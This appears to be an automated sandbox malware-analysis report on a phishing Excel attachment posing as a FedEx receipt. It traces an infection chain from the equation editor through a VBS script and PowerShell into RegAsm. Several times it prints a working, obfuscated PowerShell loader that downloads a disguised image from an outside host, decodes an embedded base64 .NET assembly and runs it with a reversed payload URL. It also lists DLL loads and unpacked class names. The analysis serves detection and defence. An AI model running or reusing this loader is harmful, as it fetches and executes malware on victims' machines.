            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('PvLlink = tA4https://uploaddeimagens'+'.com.br/images/004/807/053/original/new_image.jpg?1719846235tA4'+'; PvLwebClient ='+' New-Object System.Net.WebClient'+'; try { PvLdownloadedData = PvLwebCl'+'ient.DownloadData(PvLlink) } catch { '+'Write-H'+'ost tA4Failed To download data from PvLlinktA4 -ForegroundCol'+'or Red; exit };'+' if (PvLdownloadedData -ne PvLnull) { '+'PvLima'+'geTex'+'t = [System.Text.Encoding]::UTF8.GetString(PvLdownloadedData'+'); PvLstartFla'+'g = tA4<<BASE64_START>>tA4; PvLendFlag = tA4<<BASE64_END>'+'>tA4; PvLstartIndex = PvLimageText.IndexOf('+'PvLstartFl'+'ag); PvLendIndex '+'= PvLimag'+'eText.IndexO'+'f(PvLend'+'Flag); if (PvLstartIndex -ge 0 -and '+'PvLendIndex -gt PvLstartIndex) { PvLstartIndex'+' += PvLstartFlag.Length; PvLbase64Length = PvLendI'+'ndex - PvLstartIndex; '+'PvLbase64Command = PvLimageText.Substring(PvLstartIndex,'+' PvLbase64Length)'+'; Pv'+'Lcomma'+'ndBytes = '+'[System.Convert]::FromBase64String(PvLbase64Command);'+' PvLloadedAssembly = [System.Reflection.Ass'+'embly]::Load(PvLcommandB'+'ytes); PvLtype = PvLloadedAssembly'+'.GetType(tA4RunPE.HometA4); PvLmethod = PvLtype.GetMethod(tA4VAItA4).Invoke(PvLnull, [object[]] (tA4txt.JNNB/77088/61.532.59.32//:ptthtA4 , tA4desativadotA4 , tA4desativadotA4 , tA4desativadotA4,tA4RegAsm'+'tA4,tA4tA4))'+' } }').rePLACe(([cHar]80+[cHar]118+[cHar]76),'$').rePLACe(([cHar]116+[cHar]65+[cHar]52),[StRInG][cHar]39)| IEx"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" -Embedding
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\magesofrosepetelflowerstogetitgrea.vBS" Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('PvLlink = tA4https://uploaddeimagens'+'.com.br/images/004/807/053/original/new_image.jpg?1719846235tA4'+'; PvLwebClient ='+' New-Object System.Net.WebClient'+'; try { PvLdownloadedData = PvLwebCl'+'ient.DownloadData(PvLlink) } catch { '+'Write-H'+'ost tA4Failed To download data from PvLlinktA4 -ForegroundCol'+'or Red; exit };'+' if (PvLdownloadedData -ne PvLnull) { '+'PvLima'+'geTex'+'t = [System.Text.Encoding]::UTF8.GetString(PvLdownloadedData'+'); PvLstartFla'+'g = tA4<<BASE64_START>>tA4; PvLendFlag = tA4<<BASE64_END>'+'>tA4; PvLstartIndex = PvLimageText.IndexOf('+'PvLstartFl'+'ag); PvLendIndex '+'= PvLimag'+'eText.IndexO'+'f(PvLend'+'Flag); if (PvLstartIndex -ge 0 -and '+'PvLendIndex -gt PvLstartIndex) { PvLstartIndex'+' += PvLstartFlag.Length; PvLbase64Length = PvLendI'+'ndex - PvLstartIndex; '+'PvLbase64Command = PvLimageText.Substring(PvLstartIndex,'+' PvLbase64Length)'+'; Pv'+'Lcomma'+'ndBytes = '+'[System.Convert]::FromBase64String(PvLbase64Command);'+' PvLloadedAssembly = [System.Reflection.Ass'+'embly]::Load(PvLcommandB'+'ytes); PvLtype = PvLloadedAssembly'+'.GetType(tA4RunPE.HometA4); PvLmethod = PvLtype.GetMethod(tA4VAItA4).Invoke(PvLnull, [object[]] (tA4txt.JNNB/77088/61.532.59.32//:ptthtA4 , tA4desativadotA4 , tA4desativadotA4 , tA4desativadotA4,tA4RegAsm'+'tA4,tA4tA4))'+' } }').rePLACe(([cHar]80+[cHar]118+[cHar]76),'$').rePLACe(([cHar]116+[cHar]65+[cHar]52),[StRInG][cHar]39)| IEx"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
            Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess created: unknown unknownJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: propsys.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: ntmarta.dllJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64win.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64cpu.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rpcrtremote.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: credssp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
            Source: Binary string: RunPE.pdb source: powershell.exe, 0000000A.00000002.479671681.00000000062E6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.479671681.0000000006221000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.473348912.0000000000280000.00000004.08000000.00040000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: RegAsm.exe, RegAsm.exe, 0000000C.00000002.572497070.0000000002380000.00000040.00001000.00020000.00000000.sdmp
            Source: ~DFE1D622D06AD63FEF.TMP.0.drInitial sample: OLE indicators vbamacros = False
            Source: FedEx Receipt_53065724643.xlsInitial sample: OLE indicators encrypted = True

            Data Obfuscation

            barindex
            Source: 10.2.powershell.exe.280000.0.raw.unpack, RunPEE.cs.Net Code: Run4 System.Reflection.Assembly.Load(byte[])
            Source: 10.2.powershell.exe.6254d98.2.raw.unpack, RunPEE.cs.Net Code: Run4 System.Reflection.Assembly.Load(byte[])
            Source: 10.2.powershell.exe.6672f94.1.raw.unpack, RunPEE.cs.Net Code: Run4 System.Reflection.Assembly.Load(byte[])
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('PvLlink = tA4https://uploaddeimagens'+'.com.br/images/004/807/053/original/new_image.jpg?1719846235tA4'+'; PvLwebClient ='+' New-Object System.Net.WebClient'+'; try { PvLdownloadedData = PvLwebCl'+'ient.DownloadData(PvLlink) } catch { '+'Write-H'+'ost tA4Failed To download data from PvLlinktA4 -ForegroundCol'+'or Red; exit };'+' if (PvLdownloadedData -ne PvLnull) { '+'PvLima'+'geTex'+'t = [System.Text.Encoding]::UTF8.GetString(PvLdownloadedData'+'); PvLstartFla'+'g = tA4<<BASE64_START>>tA4; PvLendFlag = tA4<<BASE64_END>'+'>tA4; PvLstartIndex = PvLimageText.IndexOf('+'PvLstartFl'+'ag); PvLendIndex '+'= PvLimag'+'eText.IndexO'+'f(PvLend'+'Flag); if (PvLstartIndex -ge 0 -and '+'PvLendIndex -gt PvLstartIndex) { PvLstartIndex'+' += PvLstartFlag.Length; PvLbase64Length = PvLendI'+'ndex - PvLstartIndex; '+'PvLbase64Command = PvLimageText.Substring(PvLstartIndex,'+' PvLbase64Length)'+'; Pv'+'Lcomma'+'ndBytes = '+'[System.Convert]::FromBase64String(PvLbase64Command);'+' PvLloadedAssembly = [System.Reflection.Ass'+'embly]::Load(PvLcommandB'+'ytes); PvLtype = PvLloadedAssembly'+'.GetType(tA4RunPE.HometA4); PvLmethod = PvLtype.GetMethod(tA4VAItA4).Invoke(PvLnull, [object[]] (tA4txt.JNNB/77088/61.532.59.32//:ptthtA4 , tA4desativadotA4 , tA4desativadotA4 , tA4desativadotA4,tA4RegAsm'+'tA4,tA4tA4))'+' } }').rePLACe(([cHar]80+[cHar]118+[cHar]76),'$').rePLACe(([cHar]116+[cHar]65+[cHar]52),[StRInG][cHar]39)| IEx"
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('PvLlink = tA4https://uploaddeimagens'+'.com.br/images/004/807/053/original/new_image.jpg?1719846235tA4'+'; PvLwebClient ='+' New-Object System.Net.WebClient'+'; try { PvLdownloadedData = PvLwebCl'+'ient.DownloadData(PvLlink) } catch { '+'Write-H'+'ost tA4Failed To download data from PvLlinktA4 -ForegroundCol'+'or Red; exit };'+' if (PvLdownloadedData -ne PvLnull) { '+'PvLima'+'geTex'+'t = [System.Text.Encoding]::UTF8.GetString(PvLdownloadedData'+'); PvLstartFla'+'g = tA4<<BASE64_START>>tA4; PvLendFlag = tA4<<BASE64_END>'+'>tA4; PvLstartIndex = PvLimageText.IndexOf('+'PvLstartFl'+'ag); PvLendIndex '+'= PvLimag'+'eText.IndexO'+'f(PvLend'+'Flag); if (PvLstartIndex -ge 0 -and '+'PvLendIndex -gt PvLstartIndex) { PvLstartIndex'+' += PvLstartFlag.Length; PvLbase64Length = PvLendI'+'ndex - PvLstartIndex; '+'PvLbase64Command = PvLimageText.Substring(PvLstartIndex,'+' PvLbase64Length)'+'; Pv'+'Lcomma'+'ndBytes = '+'[System.Convert]::FromBase64String(PvLbase64Command);'+' PvLloadedAssembly = [System.Reflection.Ass'+'embly]::Load(PvLcommandB'+'ytes); PvLtype = PvLloadedAssembly'+'.GetType(tA4RunPE.HometA4); PvLmethod = PvLtype.GetMethod(tA4VAItA4).Invoke(PvLnull, [object[]] (tA4txt.JNNB/77088/61.532.59.32//:ptthtA4 , tA4desativadotA4 , tA4desativadotA4 , tA4desativadotA4,tA4RegAsm'+'tA4,tA4tA4))'+' } }').rePLACe(([cHar]80+[cHar]118+[cHar]76),'$').rePLACe(([cHar]116+[cHar]65+[cHar]52),[StRInG][cHar]39)| IEx"Jump to behavior
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('PvLlink = tA4https://uploaddeimagens'+'.com.br/images/004/807/053/original/new_image.jpg?1719846235tA4'+'; PvLwebClient ='+' New-Object System.Net.WebClient'+'; try { PvLdownloadedData = PvLwebCl'+'ient.DownloadData(PvLlink) } catch { '+'Write-H'+'ost tA4Failed To download data from PvLlinktA4 -ForegroundCol'+'or Red; exit };'+' if (PvLdownloadedData -ne PvLnull) { '+'PvLima'+'geTex'+'t = [System.Text.Encoding]::UTF8.GetString(PvLdownloadedData'+'); PvLstartFla'+'g = tA4<<BASE64_START>>tA4; PvLendFlag = tA4<<BASE64_END>'+'>tA4; PvLstartIndex = PvLimageText.IndexOf('+'PvLstartFl'+'ag); PvLendIndex '+'= PvLimag'+'eText.IndexO'+'f(PvLend'+'Flag); if (PvLstartIndex -ge 0 -and '+'PvLendIndex -gt PvLstartIndex) { PvLstartIndex'+' += PvLstartFlag.Length; PvLbase64Length = PvLendI'+'ndex - PvLstartIndex; '+'PvLbase64Command = PvLimageText.Substring(PvLstartIndex,'+' PvLbase64Length)'+'; Pv'+'Lcomma'+'ndBytes = '+'[System.Convert]::FromBase64String(PvLbase64Command);'+' PvLloadedAssembly = [System.Reflection.Ass'+'embly]::Load(PvLcommandB'+'ytes); PvLtype = PvLloadedAssembly'+'.GetType(tA4RunPE.HometA4); PvLmethod = PvLtype.GetMethod(tA4VAItA4).Invoke(PvLnull, [object[]] (tA4txt.JNNB/77088/61.532.59.32//:ptthtA4 , tA4desativadotA4 , tA4desativadotA4 , tA4desativadotA4,tA4RegAsm'+'tA4,tA4tA4))'+' } }').rePLACe(([cHar]80+[cHar]118+[cHar]76),'$').rePLACe(([cHar]116+[cHar]65+[cHar]52),[StRInG][cHar]39)| IEx"
            Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "('PvLlink = tA4https://uploaddeimagens'+'.com.br/images/004/807/053/original/new_image.jpg?1719846235tA4'+'; PvLwebClient ='+' New-Object System.Net.WebClient'+'; try { PvLdownloadedData = PvLwebCl'+'ient.DownloadData(PvLlink) } catch { '+'Write-H'+'ost tA4Failed To download data from PvLlinktA4 -ForegroundCol'+'or Red; exit };'+' if (PvLdownloadedData -ne PvLnull) { '+'PvLima'+'geTex'+'t = [System.Text.Encoding]::UTF8.GetString(PvLdownloadedData'+'); PvLstartFla'+'g = tA4<<BASE64_START>>tA4; PvLendFlag = tA4<<BASE64_END>'+'>tA4; PvLstartIndex = PvLimageText.IndexOf('+'PvLstartFl'+'ag); PvLendIndex '+'= PvLimag'+'eText.IndexO'+'f(PvLend'+'Flag); if (PvLstartIndex -ge 0 -and '+'PvLendIndex -gt PvLstartIndex) { PvLstartIndex'+' += PvLstartFlag.Length; PvLbase64Length = PvLendI'+'ndex - PvLstartIndex; '+'PvLbase64Command = PvLimageText.Substring(PvLstartIndex,'+' PvLbase64Length)'+'; Pv'+'Lcomma'+'ndBytes = '+'[System.Convert]::FromBase64String(PvLbase64Command);'+' PvLloadedAssembly = [System.Reflection.Ass'+'embly]::Load(PvLcommandB'+'ytes); PvLtype = PvLloadedAssembly'+'.GetType(tA4RunPE.HometA4); PvLmethod = PvLtype.GetMethod(tA4VAItA4).Invoke(PvLnull, [object[]] (tA4txt.JNNB/77088/61.532.59.32//:ptthtA4 , tA4desativadotA4 , tA4desativadotA4 , tA4desativadotA4,tA4RegAsm'+'tA4,tA4tA4))'+' } }').rePLACe(([cHar]80+[cHar]118+[cHar]76),'$').rePLACe(([cHar]116+[cHar]65+[cHar]52),[StRInG][cHar]39)| IEx"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_002A21D8 push ebx; iretd 10_2_002A21EA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00414023 push esp; iretd 12_2_0041403D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_004021C2 push ebp; ret 12_2_004021CF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00402209 push ebp; ret 12_2_004021CF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00411B15 push ss; retf 12_2_00411B46
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00403400 push eax; ret 12_2_00403402
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0041A408 pushfd ; ret 12_2_0041A409
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00404D15 pushfd ; iretd 12_2_00404D76
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_00408605 push ss; retf 12_2_0040861C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0040773F push edx; iretd 12_2_0040774B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0239DFA1 push ecx; ret 12_2_0239DFB4
            Source: 10.2.powershell.exe.280000.0.raw.unpack, Home.csHigh entropy of concatenated method names: 'VAI', 'ReverseString', 'wj8oxcKQMhWyu3MiMB', 'eL61cEhr3TEsU6jQVJ', 'Xd0LwFzhEBVfQPGGSn', 'rQcd3TTSI6lCVHMl6JH', 'rbJryoTTdjpvdQgZCqq', 'WaP97STAZD9pAa0scHE', 'XMNkWLT7BBsCZiElwGi', 'yaMjewTLB6ko7gsuukK'
            Source: 10.2.powershell.exe.280000.0.raw.unpack, RunPEE.csHigh entropy of concatenated method names: 'Ande', 'Run3', 'Run4', 'TryRun', 'LoadLibraryA', 'GetProcAddress', 'LoadApi', 'HandleRun', 'rBogTi80hXY4MBxwGs', 'oORNlfqPK7qWaCHWnV'
            Source: 10.2.powershell.exe.280000.0.raw.unpack, Class2.csHigh entropy of concatenated method names: 'Start', 'sKo86fe9HGSnuwD9Ru', 'jdCsFhaPKJKkHAuFtI', 'ljlkD5QJDjiBlqQVUp', 'KoLdFvvo7Bp3WbpvJo', 'BKD5yIXBRqe4pqYdO2', 'O8M2MxIrcxBqL8Y6kA', 'FIoy5YnpW2lcjrJgZm', 'U7bGgk34FJ6pe9MuuE', 'qgy00q9HW7w1Ngk0MQ'
            Source: 10.2.powershell.exe.6254d98.2.raw.unpack, Home.csHigh entropy of concatenated method names: 'VAI', 'ReverseString', 'wj8oxcKQMhWyu3MiMB', 'eL61cEhr3TEsU6jQVJ', 'Xd0LwFzhEBVfQPGGSn', 'rQcd3TTSI6lCVHMl6JH', 'rbJryoTTdjpvdQgZCqq', 'WaP97STAZD9pAa0scHE', 'XMNkWLT7BBsCZiElwGi', 'yaMjewTLB6ko7gsuukK'
            Source: 10.2.powershell.exe.6254d98.2.raw.unpack, RunPEE.csHigh entropy of concatenated method names: 'Ande', 'Run3', 'Run4', 'TryRun', 'LoadLibraryA', 'GetProcAddress', 'LoadApi', 'HandleRun', 'rBogTi80hXY4MBxwGs', 'oORNlfqPK7qWaCHWnV'
            Source: 10.2.powershell.exe.6254d98.2.raw.unpack, Class2.csHigh entropy of concatenated method names: 'Start', 'sKo86fe9HGSnuwD9Ru', 'jdCsFhaPKJKkHAuFtI', 'ljlkD5QJDjiBlqQVUp', 'KoLdFvvo7Bp3WbpvJo', 'BKD5yIXBRqe4pqYdO2', 'O8M2MxIrcxBqL8Y6kA', 'FIoy5YnpW2lcjrJgZm', 'U7bGgk34FJ6pe9MuuE', 'qgy00q9HW7w1Ngk0MQ'
            Source: 10.2.powershell.exe.6672f94.1.raw.unpack, Home.csHigh entropy of concatenated method names: 'VAI', 'ReverseString', 'wj8oxcKQMhWyu3MiMB', 'eL61cEhr3TEsU6jQVJ', 'Xd0LwFzhEBVfQPGGSn', 'rQcd3TTSI6lCVHMl6JH', 'rbJryoTTdjpvdQgZCqq', 'WaP97STAZD9pAa0scHE', 'XMNkWLT7BBsCZiElwGi', 'yaMjewTLB6ko7gsuukK'
            Source: 10.2.powershell.exe.6672f94.1.raw.unpack, RunPEE.csHigh entropy of concatenated method names: 'Ande', 'Run3', 'Run4', 'TryRun', 'LoadLibraryA', 'GetProcAddress', 'LoadApi', 'HandleRun', 'rBogTi80hXY4MBxwGs', 'oORNlfqPK7qWaCHWnV'
            Source: 10.2.powershell.exe.6672f94.1.raw.unpack, Class2.csHigh entropy of concatenated method names: 'Start', 'sKo86fe9HGSnuwD9Ru', 'jdCsFhaPKJKkHAuFtI', 'ljlkD5QJDjiBlqQVUp', 'KoLdFvvo7Bp3WbpvJo', 'BKD5yIXBRqe4pqYdO2', 'O8M2MxIrcxBqL8Y6kA', 'FIoy5YnpW2lcjrJgZm', 'U7bGgk34FJ6pe9MuuE', 'qgy00q9HW7w1Ngk0MQ'

            Persistence and Installation Behavior

            barindex
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \Device\RdpDr\;:1\ilang.in\DavWWWRootJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: \Device\RdpDr\;:1\ilang.in\DavWWWRootJump to behavior
            Source: Office documentLLM: Score: 9 Reasons: The document prominently displays the logo of a well-known brand (Office) which could be used to impersonate the brand and gain the user's trust. The text creates a sense of urgency and interest by instructing the user to 'Open the document in Microsoft Office' and to 'Enable Editing' and 'Enable Content' from the yellow bar above. These instructions are commonly used in phishing attacks to trick users into enabling macros, which can then execute malicious code. The combination of brand impersonation, urgency, and specific instructions to enable potentially harmful features significantly increases the risk of phishing or malware.
